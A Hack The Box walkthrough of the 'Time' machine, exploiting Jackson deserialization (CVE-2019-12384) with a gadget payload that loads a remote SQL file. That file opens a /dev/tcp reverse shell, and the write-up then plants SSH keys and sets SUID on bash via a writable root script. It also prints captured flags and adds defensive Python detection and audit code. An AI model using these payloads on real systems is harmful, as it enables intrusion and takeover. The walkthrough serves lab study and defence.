Hack-The-Box-walkthrough[time]

Introduction

OS: Linux
Difficulty: Medium
Points: 30
Release: 24 Oct 2020
IP: 10.10.10.214

User Blood Sp3eD 00 days, 00 hours, 08 mins, 51 seconds.
Root Blood Sp3eD 00 days, 00 hours, 17 mins, 49 seconds.

  • my htb rank

information gathering

First, run nmap as usual:

root@kali:~/hackthebox/machine/time# nmap -sV -v -p- 10.10.10.214 --min-rate=10000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

port 80

Port 80 serves a simple JSON beautifier and validator.
Entering a simple value such as "test" into the beautifier just returns null.
The validator is marked as beta; feeding it the same input gives an error instead:

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN

The com.fasterxml.jackson.core package looks interesting; a quick search turns up the following article.

  • Understanding insecure implementation of Jackson Deserialization

After reading the article, try the approach it describes and see how the validator reacts:

Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object

Searching for this error message leads to a solution:

  • com.fasterxml.jackson.databind.exc.MismatchedInputException

That Stack Overflow answer gives the fix for our problem: the payload needs to use '[]' instead of '{}'. Let's try that right away.

Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.InvalidTypeIdException: Could not resolve type id 'test' as a subtype of [simple type, class java.lang.Object]: no such class found

We still get an error, but a different one: "Could not resolve type id 'test' ... no such class found".

After a few more searches, I found the relevant CVE:

  • CVE-2019-12384

Exploit

  1. Step 1

Create a file named inject.sql with the following content; change the IP address and port to those of your listener.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('setsid bash -i &>/dev/tcp/10.10.14.2/3344 0>&1 &')
  2. Step 2

Start a Python HTTP server to serve inject.sql, and a netcat listener for the reverse shell.

root@kali:~/hackthebox/machine/time# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
  3. Step 3

On the website, select "Validate (beta!)" and submit the following payload (change the IP address to your own here as well):

["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.2/inject.sql'"}]

We get a shell back and can read the user flag:

root@kali:~# nc -lvp 3344
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::3344
Ncat: Listening on 0.0.0.0:3344
Ncat: Connection from 10.10.10.214.
Ncat: Connection from 10.10.10.214:60198.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$ id
id
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
pericles@time:/var/www/html$ whoami
whoami
pericles
pericles@time:/var/www/html$ cd
cd
bash: cd: HOME not set
pericles@time:/var/www/html$ cd ~
cd ~
pericles@time:/home/pericles$ ls
ls
snap
user.txt
pericles@time:/home/pericles$ cat user.txt
cat user.txt
f1cd7712d0ea3d98f672c90c975aa156
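From the defender's side, the payload above has a very recognisable shape: a Jackson wrapper-array type id (a fully qualified Java class name as the first element) followed by an H2 JDBC URL carrying INIT=RUNSCRIPT. As an added example, not part of the original write-up, the following Python detection logic flags request bodies of that shape; the gadget class name comes from the write-up, while the sample bodies, the ATTACKER-HOST placeholder and the function names are constructed for this example.

```python
"""Flag JSON bodies shaped like a Jackson default-typing gadget (CVE-2019-12384).
Added example for this write-up, not code from the original post or Jackson:
a wrapper array ["fully.qualified.Class", {...}] plus an H2 URL with RUNSCRIPT.
"""
import json
import re

# A dotted, package-qualified Java class name used as the array's type id.
JAVA_CLASS_RE = re.compile(r"^(?:[a-z][a-z0-9_]*\.){2,}[A-Z][A-Za-z0-9_$]*$")
GADGET_PREFIXES = ("ch.qos.logback.core.db.",)  # the gadget from the write-up
H2_RUNSCRIPT_RE = re.compile(r"jdbc:h2:.*INIT\s*=\s*RUNSCRIPT", re.IGNORECASE)

def _strings(obj):
    """Yield every string value nested anywhere in a decoded JSON document."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from _strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _strings(v)

def analyse_body(body: str) -> list:
    """Return the reasons a request body looks like a typing gadget, or []."""
    try:
        data = json.loads(body)
    except ValueError:
        return []  # not JSON; nothing for this rule to say
    reasons = []
    # As.WRAPPER_ARRAY encoding: ["fully.qualified.Class", {properties}]
    if (isinstance(data, list) and len(data) == 2 and isinstance(data[0], str)
            and isinstance(data[1], dict) and JAVA_CLASS_RE.match(data[0])):
        reasons.append("wrapper-array type id: " + data[0])
        if data[0].startswith(GADGET_PREFIXES):
            reasons.append("known gadget class")
    for s in _strings(data):
        if H2_RUNSCRIPT_RE.search(s):
            reasons.append("H2 JDBC URL with INIT=RUNSCRIPT")
            break
    return reasons

# Constructed samples: the write-up's payload shape (placeholder host) and benign input.
SAMPLES = {
    "gadget": '["ch.qos.logback.core.db.DriverManagerConnectionSource",'
              '{"url":"jdbc:h2:mem:;INIT=RUNSCRIPT FROM \'http://ATTACKER-HOST/x.sql\'"}]',
    "benign": '{"name": "test", "tags": ["a", "b"]}',
    "not_json": "test",
}
```

The wrapper-array check fires on any package-qualified class name, so it also catches gadgets outside the one prefix listed; treat the "known gadget class" reason as the high-confidence signal and the others as worth logging.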

Add an SSH public key to authorized_keys to get a proper SSH session.

pericles@time:/home/pericles$ mkdir .ssh
mkdir .ssh
pericles@time:/home/pericles$ ls -la
ls -la
total 48
drwxr-xr-x 8 pericles pericles 4096 Nov 7 09:04 .
drwxr-xr-x 3 root root 4096 Oct 2 13:45 ..
lrwxrwxrwx 1 root root 9 Oct 1 15:05 .bash_history -> /dev/null
-rw-r--r-- 1 pericles pericles 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 pericles pericles 3771 Feb 25 2020 .bashrc
drwx------ 2 pericles pericles 4096 Sep 20 13:53 .cache
drwx------ 3 pericles pericles 4096 Oct 22 17:45 .config
drwx------ 2 pericles pericles 4096 Nov 6 19:31 .gnupg
lrwxrwxrwx 1 root root 9 Oct 1 15:07 .lhistory -> /dev/null
drwxrwxr-x 3 pericles pericles 4096 Sep 29 12:52 .local
-rw-r--r-- 1 pericles pericles 807 Feb 25 2020 .profile
drwxr-xr-x 2 pericles pericles 4096 Nov 7 09:04 .ssh
drwxr-xr-x 3 pericles pericles 4096 Oct 2 13:20 snap
-r-------- 1 pericles pericles 33 Nov 6 13:19 user.txt
pericles@time:/home/pericles$ cd .ssh
cd .ssh
pericles@time:/home/pericles/.ssh$ echo "ssh-rsa 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 root@kali" > authorized_keys
pericles@time:/home/pericles/.ssh$ ls
ls
authorized_keys

Now connect over SSH:

root@kali:~/hackthebox/machine/time# chmod 600 id_rsa 
root@kali:~/hackthebox/machine/time# ssh -i id_rsa pericles@10.10.10.214
The authenticity of host '10.10.10.214 (10.10.10.214)' can't be established.
ECDSA key fingerprint is SHA256:sMBq2ECkw0OgfWnm+CdzEgN36He1XtCyD76MEhD/EKU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.214' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat 07 Nov 2020 09:07:07 AM UTC

System load: 0.75
Usage of /: 23.7% of 29.40GB
Memory usage: 33%
Swap usage: 0%
Processes: 249
Users logged in: 0
IPv4 address for ens160: 10.10.10.214
IPv6 address for ens160: dead:beef::250:56ff:feb9:da3d


83 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


Last login: Fri Oct 23 09:19:19 2020 from 10.10.14.5
pericles@time:~$ id
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
pericles@time:~$ whoami
pericles

Privilege escalation

Run LinEnum:

  • privilege-escalation-awesome-scripts-suite

The LinEnum results show an interesting script:

/bin/bash /usr/bin/timer_backup.sh

Check whether we have write permission on that file:

pericles@time:~$ ls -la /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Nov 7 09:15 /usr/bin/timer_backup.sh

We have permission to write the file. Let's add a line that appends our SSH public key to root's authorized_keys:

pericles@time:~$ echo "echo ssh-rsa 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 root@kali >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh
pericles@time:~$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
echo ssh-rsa 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 root@kali >> /root/.ssh/authorized_keys

Now SSH in as root:

root@kali:~/hackthebox/machine/time# ssh -i id_rsa root@10.10.10.214
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat 07 Nov 2020 09:19:05 AM UTC

System load: 0.0
Usage of /: 23.8% of 29.40GB
Memory usage: 33%
Swap usage: 0%
Processes: 250
Users logged in: 0
IPv4 address for ens160: 10.10.10.214
IPv6 address for ens160: dead:beef::250:56ff:feb9:da3d


83 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Oct 22 17:03:52 2020
root@time:~# id
uid=0(root) gid=0(root) groups=0(root)
root@time:~# whoami
root
root@time:~# ls
backup.zip root.txt snap timer_backup.sh
root@time:~# cat root.txt
4061f1369e60de8e0c1522bdd4421ecb
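The root cause here is a script that root executes (the backup lands in /root) while an ordinary user can write it. As an added example, not code from the write-up, this Python audit extracts Exec* targets from systemd unit file text and reports any target that non-root users could modify; it assumes the script is launched from a systemd unit (which the page does not state), the unit text is a constructed sample modelled on timer_backup.sh, and exec_targets, audit_mode and audit_path are names chosen for this example.

```python
"""Audit scripts launched by systemd units for write access by non-root users.
Added example for this write-up, not the original post's code: the box ran
/usr/bin/timer_backup.sh (mode -rwxrw-rw-, owned by a normal user) as root.
"""
import os
import re
import stat

# Exec*= lines; the leading [-@+!:] prefixes are systemd's own modifiers.
EXEC_RE = re.compile(r"^\s*Exec(?:Start|StartPre|StartPost|Stop)\s*=\s*[-@+!:]*(.+)$", re.M)

def exec_targets(unit_text: str) -> list:
    """Return every absolute path on Exec*= lines (interpreter and script alike)."""
    targets = []
    for line in EXEC_RE.findall(unit_text):
        for word in line.split():
            if word.startswith("/"):
                targets.append(word)
    return targets

def audit_mode(path: str, mode: int, uid: int) -> list:
    """Pure check: reasons a root-executed file could be modified by others."""
    reasons = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append(f"{path}: group/other writable (mode {stat.S_IMODE(mode):04o})")
    if uid != 0:
        reasons.append(f"{path}: owned by uid {uid}, not root")
    return reasons

def audit_path(path: str) -> list:
    """Stat a real file and run audit_mode on it; missing files yield nothing."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return []
    return audit_mode(path, st.st_mode, st.st_uid)

# Constructed unit text modelled on the write-up's finding (not the box's real unit).
SAMPLE_UNIT = """[Unit]
Description=Website backup (constructed sample)
[Service]
ExecStart=/bin/bash /usr/bin/timer_backup.sh
"""

if __name__ == "__main__":
    for target in exec_targets(SAMPLE_UNIT):
        for finding in audit_path(target):
            print(finding)
```

Pointing audit_path at every unit under /etc/systemd/system and at the cron directories covers the same class of misconfiguration on a real host; the fix is root ownership and mode 0755 (or tighter) on anything root executes unattended.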

Privilege escalation 2

pericles@time:~$ echo "chmod +s /bin/bash" >> /usr/bin/timer_backup.sh
pericles@time:~$ /bin/bash -p
bash-5.0# id
uid=1000(pericles) gid=1000(pericles) euid=0(root) egid=0(root) groups=0(root),1000(pericles)
bash-5.0# whoami
root
bash-5.0# ls
snap user.txt
bash-5.0# cd /root
bash-5.0# cat root.txt
4061f1369e60de8e0c1522bdd4421ecb

Summary of knowledge

  • Jackson Deserialization
  • CVE-2019-12384 exploit
  • file permissions on a script executed by root

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…